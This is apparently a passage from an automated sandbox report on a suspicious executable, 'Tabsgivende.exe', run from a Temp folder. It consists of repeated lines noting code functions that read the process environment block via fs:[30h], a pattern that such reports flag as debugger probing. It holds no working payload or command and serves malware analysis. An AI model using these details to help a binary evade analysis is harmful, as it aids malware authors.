Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225CA118 mov ecx, dword ptr fs:[00000030h]	18_2_225CA118
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225CA118 mov eax, dword ptr fs:[00000030h]	18_2_225CA118
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225CA118 mov eax, dword ptr fs:[00000030h]	18_2_225CA118
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225CA118 mov eax, dword ptr fs:[00000030h]	18_2_225CA118
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225E0115 mov eax, dword ptr fs:[00000030h]	18_2_225E0115
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22550124 mov eax, dword ptr fs:[00000030h]	18_2_22550124
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2259E1D0 mov eax, dword ptr fs:[00000030h]	18_2_2259E1D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2259E1D0 mov eax, dword ptr fs:[00000030h]	18_2_2259E1D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2259E1D0 mov ecx, dword ptr fs:[00000030h]	18_2_2259E1D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2259E1D0 mov eax, dword ptr fs:[00000030h]	18_2_2259E1D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2259E1D0 mov eax, dword ptr fs:[00000030h]	18_2_2259E1D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225E61C3 mov eax, dword ptr fs:[00000030h]	18_2_225E61C3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225E61C3 mov eax, dword ptr fs:[00000030h]	18_2_225E61C3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225501F8 mov eax, dword ptr fs:[00000030h]	18_2_225501F8
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225F61E5 mov eax, dword ptr fs:[00000030h]	18_2_225F61E5
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A019F mov eax, dword ptr fs:[00000030h]	18_2_225A019F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A019F mov eax, dword ptr fs:[00000030h]	18_2_225A019F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A019F mov eax, dword ptr fs:[00000030h]	18_2_225A019F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A019F mov eax, dword ptr fs:[00000030h]	18_2_225A019F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251A197 mov eax, dword ptr fs:[00000030h]	18_2_2251A197
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251A197 mov eax, dword ptr fs:[00000030h]	18_2_2251A197
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251A197 mov eax, dword ptr fs:[00000030h]	18_2_2251A197
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22560185 mov eax, dword ptr fs:[00000030h]	18_2_22560185
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225DC188 mov eax, dword ptr fs:[00000030h]	18_2_225DC188
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225DC188 mov eax, dword ptr fs:[00000030h]	18_2_225DC188
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2253C640 mov eax, dword ptr fs:[00000030h]	18_2_2253C640
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22552674 mov eax, dword ptr fs:[00000030h]	18_2_22552674
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225E866E mov eax, dword ptr fs:[00000030h]	18_2_225E866E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225E866E mov eax, dword ptr fs:[00000030h]	18_2_225E866E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255A660 mov eax, dword ptr fs:[00000030h]	18_2_2255A660
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255A660 mov eax, dword ptr fs:[00000030h]	18_2_2255A660
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562619 mov eax, dword ptr fs:[00000030h]	18_2_22562619
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2259E609 mov eax, dword ptr fs:[00000030h]	18_2_2259E609
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2253260B mov eax, dword ptr fs:[00000030h]	18_2_2253260B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2253260B mov eax, dword ptr fs:[00000030h]	18_2_2253260B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2253260B mov eax, dword ptr fs:[00000030h]	18_2_2253260B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2253260B mov eax, dword ptr fs:[00000030h]	18_2_2253260B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2253260B mov eax, dword ptr fs:[00000030h]	18_2_2253260B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2253260B mov eax, dword ptr fs:[00000030h]	18_2_2253260B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2253260B mov eax, dword ptr fs:[00000030h]	18_2_2253260B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2253E627 mov eax, dword ptr fs:[00000030h]	18_2_2253E627
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22556620 mov eax, dword ptr fs:[00000030h]	18_2_22556620
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22558620 mov eax, dword ptr fs:[00000030h]	18_2_22558620
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252262C mov eax, dword ptr fs:[00000030h]	18_2_2252262C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255A6C7 mov ebx, dword ptr fs:[00000030h]	18_2_2255A6C7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255A6C7 mov eax, dword ptr fs:[00000030h]	18_2_2255A6C7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2259E6F2 mov eax, dword ptr fs:[00000030h]	18_2_2259E6F2
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2259E6F2 mov eax, dword ptr fs:[00000030h]	18_2_2259E6F2
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2259E6F2 mov eax, dword ptr fs:[00000030h]	18_2_2259E6F2
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2259E6F2 mov eax, dword ptr fs:[00000030h]	18_2_2259E6F2
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A06F1 mov eax, dword ptr fs:[00000030h]	18_2_225A06F1
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A06F1 mov eax, dword ptr fs:[00000030h]	18_2_225A06F1
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22524690 mov eax, dword ptr fs:[00000030h]	18_2_22524690
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22524690 mov eax, dword ptr fs:[00000030h]	18_2_22524690
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225566B0 mov eax, dword ptr fs:[00000030h]	18_2_225566B0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255C6A6 mov eax, dword ptr fs:[00000030h]	18_2_2255C6A6
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22520750 mov eax, dword ptr fs:[00000030h]	18_2_22520750
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562750 mov eax, dword ptr fs:[00000030h]	18_2_22562750
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22562750 mov eax, dword ptr fs:[00000030h]	18_2_22562750
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225AE75D mov eax, dword ptr fs:[00000030h]	18_2_225AE75D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A4755 mov eax, dword ptr fs:[00000030h]	18_2_225A4755
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255674D mov esi, dword ptr fs:[00000030h]	18_2_2255674D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255674D mov eax, dword ptr fs:[00000030h]	18_2_2255674D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255674D mov eax, dword ptr fs:[00000030h]	18_2_2255674D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22528770 mov eax, dword ptr fs:[00000030h]	18_2_22528770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h]	18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h]	18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h]	18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h]	18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h]	18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h]	18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h]	18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h]	18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h]	18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h]	18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h]	18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22530770 mov eax, dword ptr fs:[00000030h]	18_2_22530770
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22520710 mov eax, dword ptr fs:[00000030h]	18_2_22520710
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22550710 mov eax, dword ptr fs:[00000030h]	18_2_22550710
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255C700 mov eax, dword ptr fs:[00000030h]	18_2_2255C700
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255273C mov eax, dword ptr fs:[00000030h]	18_2_2255273C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255273C mov ecx, dword ptr fs:[00000030h]	18_2_2255273C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255273C mov eax, dword ptr fs:[00000030h]	18_2_2255273C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2259C730 mov eax, dword ptr fs:[00000030h]	18_2_2259C730
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255C720 mov eax, dword ptr fs:[00000030h]	18_2_2255C720
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255C720 mov eax, dword ptr fs:[00000030h]	18_2_2255C720
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2252C7C0 mov eax, dword ptr fs:[00000030h]	18_2_2252C7C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A07C3 mov eax, dword ptr fs:[00000030h]	18_2_225A07C3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225247FB mov eax, dword ptr fs:[00000030h]	18_2_225247FB
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225247FB mov eax, dword ptr fs:[00000030h]	18_2_225247FB
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225427ED mov eax, dword ptr fs:[00000030h]	18_2_225427ED
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225427ED mov eax, dword ptr fs:[00000030h]	18_2_225427ED
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225427ED mov eax, dword ptr fs:[00000030h]	18_2_225427ED
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225AE7E1 mov eax, dword ptr fs:[00000030h]	18_2_225AE7E1
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225207AF mov eax, dword ptr fs:[00000030h]	18_2_225207AF
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254245A mov eax, dword ptr fs:[00000030h]	18_2_2254245A
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255E443 mov eax, dword ptr fs:[00000030h]	18_2_2255E443
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255E443 mov eax, dword ptr fs:[00000030h]	18_2_2255E443
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255E443 mov eax, dword ptr fs:[00000030h]	18_2_2255E443
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255E443 mov eax, dword ptr fs:[00000030h]	18_2_2255E443
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255E443 mov eax, dword ptr fs:[00000030h]	18_2_2255E443
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255E443 mov eax, dword ptr fs:[00000030h]	18_2_2255E443
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255E443 mov eax, dword ptr fs:[00000030h]	18_2_2255E443
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255E443 mov eax, dword ptr fs:[00000030h]	18_2_2255E443
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254A470 mov eax, dword ptr fs:[00000030h]	18_2_2254A470
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254A470 mov eax, dword ptr fs:[00000030h]	18_2_2254A470
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254A470 mov eax, dword ptr fs:[00000030h]	18_2_2254A470
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225AC460 mov ecx, dword ptr fs:[00000030h]	18_2_225AC460
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22558402 mov eax, dword ptr fs:[00000030h]	18_2_22558402
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22558402 mov eax, dword ptr fs:[00000030h]	18_2_22558402
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22558402 mov eax, dword ptr fs:[00000030h]	18_2_22558402
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255A430 mov eax, dword ptr fs:[00000030h]	18_2_2255A430
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251E420 mov eax, dword ptr fs:[00000030h]	18_2_2251E420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251E420 mov eax, dword ptr fs:[00000030h]	18_2_2251E420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251E420 mov eax, dword ptr fs:[00000030h]	18_2_2251E420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2251C427 mov eax, dword ptr fs:[00000030h]	18_2_2251C427
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A6420 mov eax, dword ptr fs:[00000030h]	18_2_225A6420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A6420 mov eax, dword ptr fs:[00000030h]	18_2_225A6420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A6420 mov eax, dword ptr fs:[00000030h]	18_2_225A6420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A6420 mov eax, dword ptr fs:[00000030h]	18_2_225A6420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A6420 mov eax, dword ptr fs:[00000030h]	18_2_225A6420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A6420 mov eax, dword ptr fs:[00000030h]	18_2_225A6420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A6420 mov eax, dword ptr fs:[00000030h]	18_2_225A6420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225204E5 mov ecx, dword ptr fs:[00000030h]	18_2_225204E5
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225544B0 mov ecx, dword ptr fs:[00000030h]	18_2_225544B0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225AA4B0 mov eax, dword ptr fs:[00000030h]	18_2_225AA4B0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225264AB mov eax, dword ptr fs:[00000030h]	18_2_225264AB
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22528550 mov eax, dword ptr fs:[00000030h]	18_2_22528550
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22528550 mov eax, dword ptr fs:[00000030h]	18_2_22528550
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255656A mov eax, dword ptr fs:[00000030h]	18_2_2255656A
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255656A mov eax, dword ptr fs:[00000030h]	18_2_2255656A
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255656A mov eax, dword ptr fs:[00000030h]	18_2_2255656A
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225B6500 mov eax, dword ptr fs:[00000030h]	18_2_225B6500
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225F4500 mov eax, dword ptr fs:[00000030h]	18_2_225F4500
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225F4500 mov eax, dword ptr fs:[00000030h]	18_2_225F4500
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225F4500 mov eax, dword ptr fs:[00000030h]	18_2_225F4500
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225F4500 mov eax, dword ptr fs:[00000030h]	18_2_225F4500
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225F4500 mov eax, dword ptr fs:[00000030h]	18_2_225F4500
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225F4500 mov eax, dword ptr fs:[00000030h]	18_2_225F4500
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225F4500 mov eax, dword ptr fs:[00000030h]	18_2_225F4500
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22530535 mov eax, dword ptr fs:[00000030h]	18_2_22530535
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22530535 mov eax, dword ptr fs:[00000030h]	18_2_22530535
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22530535 mov eax, dword ptr fs:[00000030h]	18_2_22530535
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22530535 mov eax, dword ptr fs:[00000030h]	18_2_22530535
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22530535 mov eax, dword ptr fs:[00000030h]	18_2_22530535
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22530535 mov eax, dword ptr fs:[00000030h]	18_2_22530535
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254E53E mov eax, dword ptr fs:[00000030h]	18_2_2254E53E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254E53E mov eax, dword ptr fs:[00000030h]	18_2_2254E53E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254E53E mov eax, dword ptr fs:[00000030h]	18_2_2254E53E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254E53E mov eax, dword ptr fs:[00000030h]	18_2_2254E53E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254E53E mov eax, dword ptr fs:[00000030h]	18_2_2254E53E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225265D0 mov eax, dword ptr fs:[00000030h]	18_2_225265D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255A5D0 mov eax, dword ptr fs:[00000030h]	18_2_2255A5D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255A5D0 mov eax, dword ptr fs:[00000030h]	18_2_2255A5D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255E5CF mov eax, dword ptr fs:[00000030h]	18_2_2255E5CF
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255E5CF mov eax, dword ptr fs:[00000030h]	18_2_2255E5CF
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225225E0 mov eax, dword ptr fs:[00000030h]	18_2_225225E0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254E5E7 mov eax, dword ptr fs:[00000030h]	18_2_2254E5E7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254E5E7 mov eax, dword ptr fs:[00000030h]	18_2_2254E5E7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254E5E7 mov eax, dword ptr fs:[00000030h]	18_2_2254E5E7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254E5E7 mov eax, dword ptr fs:[00000030h]	18_2_2254E5E7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254E5E7 mov eax, dword ptr fs:[00000030h]	18_2_2254E5E7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254E5E7 mov eax, dword ptr fs:[00000030h]	18_2_2254E5E7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254E5E7 mov eax, dword ptr fs:[00000030h]	18_2_2254E5E7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254E5E7 mov eax, dword ptr fs:[00000030h]	18_2_2254E5E7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255C5ED mov eax, dword ptr fs:[00000030h]	18_2_2255C5ED
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255C5ED mov eax, dword ptr fs:[00000030h]	18_2_2255C5ED
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255E59C mov eax, dword ptr fs:[00000030h]	18_2_2255E59C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22522582 mov eax, dword ptr fs:[00000030h]	18_2_22522582
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22522582 mov ecx, dword ptr fs:[00000030h]	18_2_22522582
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22554588 mov eax, dword ptr fs:[00000030h]	18_2_22554588
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225445B1 mov eax, dword ptr fs:[00000030h]	18_2_225445B1
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225445B1 mov eax, dword ptr fs:[00000030h]	18_2_225445B1
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A05A7 mov eax, dword ptr fs:[00000030h]	18_2_225A05A7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A05A7 mov eax, dword ptr fs:[00000030h]	18_2_225A05A7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225A05A7 mov eax, dword ptr fs:[00000030h]	18_2_225A05A7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22526A50 mov eax, dword ptr fs:[00000030h]	18_2_22526A50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22526A50 mov eax, dword ptr fs:[00000030h]	18_2_22526A50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22526A50 mov eax, dword ptr fs:[00000030h]	18_2_22526A50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22526A50 mov eax, dword ptr fs:[00000030h]	18_2_22526A50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22526A50 mov eax, dword ptr fs:[00000030h]	18_2_22526A50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22526A50 mov eax, dword ptr fs:[00000030h]	18_2_22526A50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22526A50 mov eax, dword ptr fs:[00000030h]	18_2_22526A50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22530A5B mov eax, dword ptr fs:[00000030h]	18_2_22530A5B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22530A5B mov eax, dword ptr fs:[00000030h]	18_2_22530A5B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2259CA72 mov eax, dword ptr fs:[00000030h]	18_2_2259CA72
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2259CA72 mov eax, dword ptr fs:[00000030h]	18_2_2259CA72
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255CA6F mov eax, dword ptr fs:[00000030h]	18_2_2255CA6F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255CA6F mov eax, dword ptr fs:[00000030h]	18_2_2255CA6F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255CA6F mov eax, dword ptr fs:[00000030h]	18_2_2255CA6F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_225ACA11 mov eax, dword ptr fs:[00000030h]	18_2_225ACA11
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22544A35 mov eax, dword ptr fs:[00000030h]	18_2_22544A35
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_22544A35 mov eax, dword ptr fs:[00000030h]	18_2_22544A35
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255CA38 mov eax, dword ptr fs:[00000030h]	18_2_2255CA38
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2255CA24 mov eax, dword ptr fs:[00000030h]	18_2_2255CA24
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe	Code function: 18_2_2254EA2E mov eax, dword ptr fs:[00000030h]	18_2_2254EA2E
